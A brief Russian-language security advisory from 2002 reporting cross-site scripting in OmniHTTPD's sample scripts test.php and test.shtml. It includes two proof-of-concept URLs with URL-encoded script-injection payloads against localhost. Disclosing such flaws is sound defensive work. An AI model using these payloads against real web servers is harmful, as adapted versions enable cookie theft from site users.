Security Lab

Межсайтовый скриптинг в OmniHTTPD

Дата публикации:28.08.2002
Всего просмотров:1158
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Несколько возможностей межсайтового скриптинга в типовых сценариях обнаружено в OmniHTTPD. Уязвимость может использоваться местным пользователем для кражи куки или организации Web атак. Пример:
http://localhost/test.php?%3CSCRIPT%3Ealert%28document.URL%29%3C%2FSCRIPT%3E=x 
http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x
уязвимость обнаружена в OmniHTTPD 1.1- 2.4 Pro
Ссылки: OmniHTTPd test.php Cross-Site Scripting Issue